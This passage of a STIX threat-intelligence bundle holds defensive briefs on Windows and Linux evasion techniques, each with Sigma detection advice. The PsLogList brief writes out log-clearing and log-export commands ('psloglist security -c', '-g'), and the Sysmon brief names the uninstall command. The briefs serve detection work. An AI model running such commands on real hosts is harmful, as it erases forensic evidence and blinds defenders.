attackers to achieve their objectives, which could include data theft, system destruction, or deployment of ransomware, without generating critical forensic evidence.\n\n## Recommendation\n\n*   Deploy the Sigma rule \"Detect Sysinternals Sysmon Uninstall\" to your SIEM and tune for your environment to detect attempts to remove Sysmon.\n*   Ensure Sysmon process-creation logging is enabled on all critical Windows endpoints to activate the detection rule.\n*   Investigate all alerts generated by the Sysmon uninstall rule immediately, as they are strong indicators of potential compromise and defense evasion.\n*   Implement host-based intrusion prevention systems or Group Policy Objects to restrict the execution of `Sysmon.exe -u` or `Sysmon64.exe -u` to authorized accounts or processes only.\n",
      "published": "2026-07-03T14:41:30Z",
      "labels": [
        "defense-evasion",
        "endpoint-security",
        "sysmon",
        "windows"
      ],
      "object_refs": [
        "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/SigmaHQ/sigma/blob/main/rules/windows/process_creation/proc_creation_win_sysinternals_sysmon_uninstall.yml"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md#atomic-test-11---uninstall-sysmon"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--01b0e09b-1506-5d2d-8ffa-f7854bbc1154",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Account Discovery",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1087",
          "url": "https://attack.mitre.org/techniques/T1087"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--93ed75a5-f651-54da-b79b-df9c806a0251",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--26c788e7-5f56-5543-b996-eb89a749a3d5",
      "target_ref": "attack-pattern--01b0e09b-1506-5d2d-8ffa-f7854bbc1154"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--0856bd82-6dcb-584e-bbac-9f484aa79d34",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Indicator Removal on Host",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1070",
          "url": "https://attack.mitre.org/techniques/T1070"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f0dac3c1-2575-5bb7-805d-f64a2d3a94ca",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--26c788e7-5f56-5543-b996-eb89a749a3d5",
      "target_ref": "attack-pattern--0856bd82-6dcb-584e-bbac-9f484aa79d34"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--26c788e7-5f56-5543-b996-eb89a749a3d5",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Suspicious Use of PsLogList for Event Log Discovery and Evasion",
      "description": "## Overview\n\nThis brief details the suspicious use of PsLogList, a legitimate command-line utility from the Sysinternals suite, which is being abused by adversaries for both discovery and defense evasion. PsLogList allows administrators to view, filter, dump, and clear Windows event logs. Attackers exploit this functionality to extract sensitive information, such as admin accounts from security logs, facilitating further account discovery and privilege escalation. Additionally, its capability to clear event logs (`-c` flag) or export them (`-g` flag) is utilized to hinder forensic analysis and remove traces of malicious activity. This activity has been observed in campaigns by advanced threat actors, including those targeting major telecommunications companies, highlighting its role in post-compromise reconnaissance and operational security. Detection focuses on command-line arguments indicative of malicious intent rather than legitimate administrative use.\n\n## Attack Chain\n\n1.  **Initial Access**: Adversaries gain initial access to a target system through various means, such as exploiting a public-facing application, phishing, or stolen credentials.\n2.  **Tool Staging**: The PsLogList utility (`psloglist.exe` or `psloglist64.exe`) is downloaded and staged on the compromised system, often in a non-standard directory.\n3.  **Event Log Discovery (Account Enumeration)**: The adversary executes `psloglist.exe` with parameters like `security`, `application`, or `system` to dump relevant event logs, specifically searching for local or domain administrator accounts. Example: `psloglist security -d 1000`\n4.  **Event Log Export**: PsLogList is executed with the `-g` flag to export event logs to a file (`.evt`), allowing for offline analysis without triggering host-based detection. Example: `psloglist security -g C:\\temp\\security.evt`\n5.  **Defense Evasion (Log Clearing)**: The adversary uses `psloglist.exe` with the `-c` flag to clear specific event logs, such as the security log, to remove evidence of their presence and actions. Example: `psloglist security -c`\n6.  **Information Exploitation**: Information gathered from the event logs (e.g., admin accounts, system details) is then used to facilitate lateral movement, privilege escalation, or further targeting within the network.\n7.  **Impact**: Subsequent actions, such as data exfiltration or deploying ransomware, are executed, leveraging the gained privileges and evaded defenses.\n\n## Impact\n\nThe abuse of PsLogList for event log discovery and defense evasion has a significant impact on an organization's security posture. Successful exploitation allows adversaries to gain a deeper understanding of the victim environment, identify valuable accounts for privilege escalation or lateral movement, and systematically erase their tracks. This directly hampers incident response efforts by removing crucial forensic evidence, making attribution and scope determination extremely difficult. In targeted attacks, such as those against major telcos by Chinese threat actors, this can lead to sustained compromise, intellectual property theft, and disruption of critical infrastructure.\n\n## Recommendation\n\n*   Deploy the `Suspicious Use of PsLogList` Sigma rule to your SIEM to detect command-line activity associated with this tool.\n*   Ensure process creation logging (e.g., via Sysmon) is enabled and configured to capture full command-line arguments to activate the rules above.\n*   Regularly review administrative use of PsLogList to establish a baseline of legitimate activity and tune detections to reduce false positives.\n*   Investigate any instances where PsLogList is executed with parameters for clearing (`-c`) or exporting (`-g`) event logs, especially if originating from non-administrative contexts or user accounts.\n",
      "published": "2026-07-03T14:40:17Z",
      "labels": [
        "sysinternals",
        "discovery",
        "defense-evasion",
        "account-discovery",
        "log-clearing",
        "windows"
      ],
      "object_refs": [
        "attack-pattern--01b0e09b-1506-5d2d-8ffa-f7854bbc1154",
        "attack-pattern--0856bd82-6dcb-584e-bbac-9f484aa79d34"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://research.nccgroup.com/2021/01/12/abusing-cloud-services-to-fly-under-the-radar/"
        },
        {
          "source_name": "reference",
          "url": "https://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Sysinternals/PsLogList"
        },
        {
          "source_name": "reference",
          "url": "https://twitter.com/EricaZelic/status/1614075109827874817"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--57a5a157-042c-5571-997f-8d7848a8e947",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--fc8b09c3-138b-5cb4-a675-294cb973e28f",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation for Privilege Escalation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1068",
          "url": "https://attack.mitre.org/techniques/T1068"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--84f677ec-1f8d-5c3b-a990-5d127ad99c90",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--fc8b09c3-138b-5cb4-a675-294cb973e28f",
      "target_ref": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--fc8b09c3-138b-5cb4-a675-294cb973e28f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "WatchGuard Firebox and Mobile VPN Client Vulnerabilities",
      "description": "## Overview\n\nOn July 2, 2026, WatchGuard published security advisories detailing multiple critical vulnerabilities affecting its Fireware OS and Mobile VPN with SSL client for Windows. These vulnerabilities include a race condition and use-after-free flaw within the Mobile VPN with IKEv2 LDAP Authentication service on Firebox appliances, potentially allowing unauthenticated remote attackers to achieve arbitrary code execution. Additionally, a local privilege escalation vulnerability was identified in the Mobile VPN with SSL Windows client, which could enable a low-privileged local attacker to gain SYSTEM-level access. These issues pose significant risks to network integrity and endpoint security for organizations utilizing WatchGuard products, highlighting the urgent need for administrators to apply the recommended updates to prevent exploitation. The advisories, serial number AV26-649, emphasize the critical importance of patching.\n\n## Attack Chain\n\n1.  **Initial Exposure**: A vulnerable WatchGuard Firebox appliance with its Mobile VPN with IKEv2 LDAP authentication service exposed to the internet is identified by an attacker.\n2.  **Malicious IKEv2 Request**: An unauthenticated remote attacker sends specially crafted IKEv2 LDAP authentication requests to the exposed Firebox service.\n3.  **Vulnerability Trigger**: The crafted requests exploit a race condition and use-after-free vulnerability within the Firebox's operating system, leading to memory corruption.\n4.  **Arbitrary Code Execution**: Successful exploitation of this vulnerability results in arbitrary code execution on the Firebox appliance, granting the attacker elevated privileges and control over the network gateway device.\n5.  **Network Compromise**: The attacker leverages the compromised Firebox to establish a foothold within the target organization's internal network or manipulate network security policies.\n6.  **Local Client Exploitation**: Separately, an attacker with existing low-privileged access on a Windows workstation where the vulnerable Mobile VPN with SSL client is installed.\n7.  **Privilege Escalation**: The attacker executes a local exploit specifically targeting the privilege escalation vulnerability present within the VPN client software.\n8.  **System Control**: Successful exploitation of the client-side vulnerability grants the attacker SYSTEM-level privileges on the affected Windows workstation, allowing for full control, malware deployment, or data exfiltration.\n\n## Impact\n\nSuccessful exploitation of these vulnerabilities could lead to severe consequences for affected organizations. The remote code execution vulnerability in Firebox appliances allows an unauthenticated attacker to take complete control of the network gateway, potentially leading to unauthorized access to the internal network, disruption of services, or manipulation of firewall rules. The local privilege escalation vulnerability in the Windows client could allow an attacker who has already gained initial low-privileged access to a workstation to escalate privileges to SYSTEM, enabling them to install persistent malware, access sensitive data, or further compromise the system. While no specific victim count or targeted sectors were detailed in the advisory, organizations reliant on these WatchGuard products face a direct and immediate risk of compromise if patches are not applied.\n\n## Recommendation\n\n*   Review the WatchGuard security advisories referenced in this brief for detailed instructions.\n*   Immediately update all affected Fireware OS versions as specified in the WatchGuard advisories.\n*   Update all installations of the Mobile VPN with SSL client for Windows to the latest patched version.\n",
      "published": "2026-07-03T14:39:33Z",
      "labels": [
        "watchguard",
        "vulnerability",
        "network-device",
        "vpn",
        "privilege-escalation",
        "remote-code-execution"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://cyber.gc.ca/en/alerts-advisories/watchguard-security-advisory-av26-649"
        },
        {
          "source_name": "reference",
          "url": "https://www.watchguard.com/wgrd-psirt/advisory/wgsa-2026-00023"
        },
        {
          "source_name": "reference",
          "url": "https://www.watchguard.com/wgrd-psirt/advisory/wgsa-2026-00027"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--050d5077-442b-5efa-b26f-551a73b52fb2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Obfuscated Files or Information",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1027",
          "url": "https://attack.mitre.org/techniques/T1027"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--9cf6b60e-5460-54f8-a29c-ed2de0120951",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--937c44d8-ce97-557a-b399-f035ef1cecf8",
      "target_ref": "attack-pattern--050d5077-442b-5efa-b26f-551a73b52fb2"
    },
    {
      "type": "threat-actor",
      "spec_version": "2.1",
      "id": "threat-actor--ab794784-b09d-5e20-a716-bc3078e7c70c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Various APTs and criminal groups"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ae7a83c6-80c2-5be4-a4db-b32cb9d98b66",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "attributed-to",
      "source_ref": "report--937c44d8-ce97-557a-b399-f035ef1cecf8",
      "target_ref": "threat-actor--ab794784-b09d-5e20-a716-bc3078e7c70c"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--937c44d8-ce97-557a-b399-f035ef1cecf8",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Suspicious Process Execution from Linux Shared Memory (/dev/shm)",
      "description": "## Overview\n\nAttackers are increasingly leveraging the Linux shared memory directory, `/dev/shm`, as a stealthy staging ground for malicious executables. This directory functions as a `tmpfs` mount, meaning it resides entirely in RAM, preventing files written within it from ever touching physical disk. This characteristic makes it an attractive location for fileless malware, as it can bypass traditional disk-based forensic tools and detection mechanisms. The technique has been observed in campaigns by various advanced persistent threat (APT) groups and criminal organizations, notably linked to implants like BPFDoor, DecisiveArchitect, JustForFun, and Orbit malware, indicating its widespread adoption in Linux-focused attacks. The abuse of `/dev/shm` primarily aims at achieving execution while maintaining a low footprint, making detection challenging for defenders who are not actively monitoring process creation from this specific, often overlooked, directory.\n\n## Attack Chain\n\n1.  **Initial Access:** Attackers gain initial access to a Linux system, often via exploiting vulnerable internet-facing services (e.g., SSH, web applications), weak credentials, or phishing.\n2.  **Foothold \u0026 Staging:** Once a foothold is established, the adversary typically downloads or stages malicious payloads, scripts, or binaries onto the compromised system.\n3.  **Fileless Staging in /dev/shm:** To evade disk-based detection, the malicious executable is written directly into the `/dev/shm` directory, ensuring it resides only in memory.\n4.  **Execution from Shared Memory:** The attacker then initiates the execution of the payload from `/dev/shm/`, masquerading it as a legitimate process or leveraging common execution methods.\n5.  **Implant Deployment/Execution:** The executed binary establishes persistence, deploys additional implants, or performs initial reconnaissance on the compromised system.\n6.  **Command and Control (C2):** A C2 channel is established for remote management, data exfiltration, or further instruction delivery.\n7.  **Impact:** Depending on the attacker's objective, this may lead to data theft, cryptomining, resource hijacking, or the establishment of a long-term presence for future operations.\n\n## Impact\n\nThe successful exploitation of this technique can lead to significant compromise of Linux systems, ranging from data exfiltration and intellectual property theft to resource hijacking for cryptomining, and the establishment of persistent backdoors. Because malware executed from `/dev/shm` leaves minimal forensic artifacts on disk, incident response and forensic analysis become significantly more challenging, increasing the dwell time of attackers. While no specific victim counts are tied to this generalized technique in the source material, its use by sophisticated APT groups implies targeting of high-value organizations across various sectors, including government, technology, and critical infrastructure. The primary impact is reduced visibility and increased stealth for adversaries.\n\n## Recommendation\n\n*   Deploy the provided Sigma rule \"Process Execution From Shared Memory Directory\" to your SIEM.\n*   Ensure `process_creation` logging is enabled for all Linux endpoints to capture `Image` paths required by the rule.\n*   Review any legitimate applications or container runtimes that might legitimately execute processes from `/dev/shm` to tune false positives for the \"Process Execution From Shared Memory Directory\" rule.\n",
      "published": "2026-07-03T14:33:33Z",
      "labels": [
        "stealth",
        "execution",
        "linux",
        "memory-abuse"
      ],
      "object_refs": [
        "attack-pattern--050d5077-442b-5efa-b26f-551a73b52fb2",
        "threat-actor--ab794784-b09d-5e20-a716-bc3078e7c70c"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.sysdig.com/blog/containers-read-only-fileless-malware"
        },
        {
          "source_name": "reference",
          "url": "https://unfinished.bike/fun-with-the-new-bpfdoor-2023"
        },
        {
          "source_name": "reference",
          "url": "https://asiapacificdefencereporter.com/wp-content/uploads/2023/08/Final-CRWD-2023-Threat-Hunting-Report.pdf"
        },
        {
          "source_name": "reference",
          "url": "https://www.crowdstrike.com/en-us/blog/how-to-hunt-for-decisivearchitect-and-justforfun-implant/"
        },
        {
          "source_name": "reference",
          "url": "https://www.linkedin.com/posts/avradeep_malware-apt-infostealer-activity-7373203959697719296-JR-7"
        },
        {
          "source_name": "reference",
          "url": "https://www.stormshield.com/news/orbit-analysis-of-a-linux-dedicated-malware/"
        }
      ],
      "confidence": 80
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--d8fc3872-f46f-5bb9-8673-bf4a42cf353a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Suspicious Service Installation for Defense Evasion",
      "description": "## Overview\n\nThis threat brief outlines the installation of suspicious services, specifically \"NalDrv\" or \"PROCEXP152\", which are known to be used by defense evasion tools like Ghost-In-The-Logs. Ghost-In-The-Logs, often leveraging the Kernel Driver Utility (KDU) framework, aims to impair security monitoring by operating at a low level to evade detection by tools like Sysmon and Windows Event Logging. This activity typically involves modifying specific registry keys to point service binaries to non-system32 directories, a common tactic to hide malicious components. While a specific threat actor is not identified, this technique is broadly applicable to adversaries seeking to maintain stealth and persistence post-initial compromise, potentially impacting organizations across all sectors that rely on endpoint detection for security monitoring. The technique has been documented since at least 2019 and continues to be relevant for sophisticated adversaries.\n\n## Attack Chain\n\n1.  An attacker gains initial access to a Windows system through an unspecified mechanism.\n2.  The attacker executes KDU or a similar tool to load a vulnerable or malicious kernel driver.\n3.  The kernel driver modifies Windows registry keys associated with services.\n4.  Specifically, `HKLM\\System\\CurrentControlSet\\Services\\NalDrv\\ImagePath` or `HKLM\\System\\CurrentControlSet\\Services\\PROCEXP152\\ImagePath` is modified.\n5.  The `ImagePath` value is set to point to a malicious or repurposed driver located in a non-system32 folder.\n6.  This enables the Ghost-In-The-Logs tool to run with elevated privileges and evade monitoring by Sysmon and Windows Event Logging.\n\n## Impact\n\nSuccessful exploitation allows an attacker to operate with significantly reduced visibility for defenders, as critical security logs from Sysmon and Windows Event Logging can be impaired or disabled. This defense evasion facilitates further malicious activity, such as data exfiltration, lateral movement, or the deployment of ransomware, without triggering alerts. The primary impact is the loss of detection and forensic capabilities, making incident response significantly more challenging and increasing the likelihood of a successful breach going undetected for extended periods. While specific victim counts are not available, any organization relying on endpoint visibility for threat detection is vulnerable to this technique.\n\n## Recommendation\n\n*   Deploy the Sigma rule \"Suspicious Service Installed\" to your SIEM to detect attempts to install these services outside of standard paths.\n*   Ensure robust logging, especially Sysmon process creation, registry modification, and driver load events, is enabled and forwarded to your SIEM to provide the necessary data for the \"registry_set\" logsource category.\n*   Regularly review your Sysmon configuration to ensure it covers suspicious registry modifications and driver installations, as highlighted in the `TargetObject` field of the rule.\n*   Perform regular integrity checks on critical system directories and registry keys to identify unauthorized modifications, specifically monitoring changes to `HKLM\\System\\CurrentControlSet\\Services` as referenced in the `TargetObject` field.\n",
      "published": "2026-07-03T14:32:33Z",
      "labels": [
        "defense-evasion",
        "persistence",
        "kernel-driver",
        "windows"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/SigmaHQ/sigma/blob/main/rules/windows/registry/registry_set/registry_set_susp_service_installed.yml"
        },
        {
          "source_name": "reference",
          "url": "https://web.archive.org/web/20200419024230/https://blog.dylan.codes/evading-sysmon-and-windows-event-logging/"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/bats3c/Ghost-In-The-Logs"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/hfiref0x/KDU"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--fef861e9-3ac4-50b1-aa1a-3ff772ca094e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Masquerading",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1036",
          "url": "https://attack.mitre.org/techniques/T1036"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--de91205b-4f09-5987-83bf-4795bac4b07b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3c0f19b3-ca95-5e95-b7ee-a2305bfd992d",
      "target_ref": "attack-pattern--fef861e9-3ac4-50b1-aa1a-3ff772ca094e"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--3c0f19b3-ca95-5e95-b7ee-a2305bfd992d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Detection of Renamed Sysinternals Tool Usage via Registry EULA Key",
      "description": "## Overview\n\nAdversaries frequently leverage legitimate system administration tools, such as the Microsoft Sysinternals Suite, to perform malicious activities while attempting to blend in with normal system operations and evade detection. A common tactic involves renaming these tools (e.g., PsExec, ProcDump, Process Explorer) to obfuscate their true identity. This brief outlines a detection mechanism specifically designed to identify instances where non-standard or renamed executables attempt to set the \"EulaAccepted\" registry key, which is typically written by the legitimate Sysinternals tools upon their first execution. Such activity is highly indicative of defense evasion or post-exploitation stages where attackers use these powerful utilities for lateral movement, privilege escalation, or data collection, often under a masqueraded name to avoid scrutiny. Early detection of such behaviors is critical for disrupting advanced persistent threats operating within a network.\n\n## Impact\n\nThe successful use of renamed Sysinternals tools can significantly hinder a defender's ability to identify and respond to malicious activity. Attackers utilizing this technique can achieve various objectives, including remote code execution, process dumping (for credential theft), system enumeration, and persistent access without immediately triggering alerts designed for known malicious binaries. This evasion increases dwell time, allows for deeper penetration into the network, and can lead to severe consequences such as data exfiltration, deployment of ransomware, or complete system compromise. Organizations across all sectors are susceptible, as this technique exploits common toolsets rather than specific vulnerabilities in widely deployed applications.\n\n## Recommendation\n\n* Deploy the provided Sigma rule to your SIEM/EDR platform to detect suspicious \"EulaAccepted\" registry key modifications by non-Sysinternals executables.\n* Ensure robust registry event logging is enabled for all Windows endpoints, especially for `HKEY_CURRENT_USER\\Software\\Sysinternals\\` paths, to allow the Sigma rule to function effectively.\n* Conduct regular reviews of alerts generated by this rule to identify potential renamed Sysinternals usage and investigate the associated processes and parent processes.\n* Implement application whitelisting or strict execution policies to prevent unauthorized executables, particularly those mimicking legitimate tools, from running on critical systems.\n",
      "published": "2026-07-03T14:31:43Z",
      "labels": [
        "defense-evasion",
        "post-exploitation",
        "sysinternals",
        "registry",
        "windows"
      ],
      "object_refs": [
        "attack-pattern--fef861e9-3ac4-50b1-aa1a-3ff772ca094e"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/SigmaHQ/sigma/blob/main/rules/windows/registry/registry_set/registry_set_renamed_sysinternals_eula_accepted.yml"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--55190cce-3978-5d43-b6a3-64cdd80a5d56",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Obtain Capabilities",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1588",
          "url": "https://attack.mitre.org/techniques/T1588"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--045635e3-aab7-5cb0-9c1e-5732ac20c617",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--eded6020-9287-5a0a-804a-50c6a1b90e94",
      "target_ref": "attack-pattern--55190cce-3978-5d43-b6a3-64cdd80a5d56"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--fef861e9-3ac4-50b1-aa1a-3ff772ca094e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Masquerading",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1036",
          "url": "https://attack.mitre.org/techniques/T1036"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b7894e78-ee12-56e7-b9ea-fe8645340d31",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--eded6020-9287-5a0a-804a-50c6a1b90e94",
      "target_ref": "attack-pattern--fef861e9-3ac4-50b1-aa1a-3ff772ca094e"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--eded6020-9287-5a0a-804a-50c6a1b90e94",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Suspicious Execution of Renamed Sysinternals Tools via Registry",
      "description": "## Overview\n\nThis intelligence focuses on the detection of highly suspicious activity involving the Sysinternals Suite, a collection of legitimate, powerful utilities developed by Microsoft. Adversaries frequently leverage these tools for various post-exploitation activities, including process manipulation, system information gathering, and privilege escalation. To circumvent security detections that might flag the execution of standard Sysinternals tool names (e.g., `PsExec.exe`, `ProcDump.exe`), attackers often rename these executables. This brief highlights a detection opportunity centered around the creation of the `EulaAccepted` registry key, which is generated upon the first execution of a Sysinternals tool. When this key is created by an executable that does not match the known original Sysinternals filename, it strongly indicates an attempt at evasion, signaling potential malicious activity on Windows endpoints.\n\n## Impact\n\nThe successful execution of renamed Sysinternals tools allows adversaries to perform a wide range of actions on compromised Windows systems, often with elevated privileges. This could include dumping credentials, establishing persistence, monitoring system activity, or remotely executing commands, all while attempting to bypass standard security controls. Such evasion tactics enable attackers to remain undetected for longer periods, facilitating further malicious operations like data exfiltration, lateral movement, or the deployment of ransomware. The impact on an organization can range from data breaches and operational disruption to significant financial and reputational damage.\n\n## Recommendation\n\n*   Deploy the Sigma rule \"Suspicious Execution Of Renamed Sysinternals Tools - Registry\" to your SIEM/EDR to detect this evasive technique.\n*   Ensure Sysmon and Windows Registry logging are comprehensively enabled across all endpoints to capture `registry_set` events required for this detection.\n*   Investigate all alerts generated by the \"Suspicious Execution Of Renamed Sysinternals Tools - Registry\" rule immediately to determine the origin and intent of the renamed Sysinternals tool execution.\n",
      "published": "2026-07-03T14:30:39Z",
      "labels": [
        "sysinternals",
        "evasion",
        "registry",
        "windows",
        "pua"
      ],
      "object_refs": [
        "attack-pattern--55190cce-3978-5d43-b6a3-64cdd80a5d56",
        "attack-pattern--fef861e9-3ac4-50b1-aa1a-3ff772ca094e"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/SigmaHQ/sigma/blob/main/rules/windows/registry/registry_set/registry_set_pua_sysinternals_renamed_execution_via_eula.yml"
        }
      ],
      "confidence": 80
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--986ebba3-6a8e-5be7-aa99-cae95a1f91a8",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Sysinternals PsSuspend Suspicious Execution to Impair Defenses",
      "description": "## Overview\n\nThreat actors are increasingly misusing legitimate system utilities, like Microsoft's Sysinternals PsSuspend, to hinder security defenses. PsSuspend is a powerful tool designed for administrators to pause and resume processes on local or remote systems. However, its capability to suspend any running process, including critical antivirus (AV) and endpoint detection and response (EDR) agents, makes it an attractive target for adversaries seeking to operate undetected. This brief highlights the detection of PsSuspend being executed with command-line arguments targeting security processes such as `msmpeng.exe` (Microsoft Defender Antivirus service). Such activity indicates an attempt to temporarily disable or bypass security controls, allowing subsequent malicious activity to proceed without interference. While the exact campaigns are not specified in the source, this technique is broadly adopted by various sophisticated threat groups for defense evasion.\n\n## Attack Chain\n\n[Insufficient information in the provided source to construct a detailed 6-8 step attack chain covering initial access through impact. The source describes a single defense impairment action rather than a full campaign lifecycle.]\n\n## Impact\n\nSuccessful execution of PsSuspend against security processes can lead to a critical blind spot in an organization's defense posture. When AV/EDR agents are suspended, they cease to monitor, detect, and prevent malicious activities, effectively disarming endpoint protection. This allows threat actors to perform actions such as executing malware, establishing persistence, exfiltrating data, or deploying ransomware without being detected. The immediate consequence is a loss of visibility and control, significantly increasing the risk of a successful breach and subsequent data compromise or system disruption.\n\n## Recommendation\n\n*   Deploy the provided Sigma rule \"Sysinternals PsSuspend Suspicious Execution\" to your SIEM and tune for your environment to detect attempts to suspend security products.\n*   Ensure process creation logging, especially for command-line arguments, is enabled on all Windows endpoints to support the detection rules.\n*   Restrict the execution of unauthorized or unapproved system utilities, including Sysinternals tools, on critical endpoints.\n*   Implement strong access controls and principle of least privilege to prevent unauthorized users or processes from running tools like PsSuspend.\n",
      "published": "2026-07-03T14:29:07Z",
      "labels": [
        "defense-evasion",
        "utility",
        "sysinternals",
        "windows"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://learn.microsoft.com/en-us/sysinternals/downloads/pssuspend"
        },
        {
          "source_name": "reference",
          "url": "https://twitter.com/0gtweet/status/1638069413717975046"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5ef49edb-94d7-5032-9ce1-22d917ae63a7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Process Injection",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1055",
          "url": "https://attack.mitre.org/techniques/T1055"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--89c03498-2e8e-5e12-9218-2e087b52a56f",
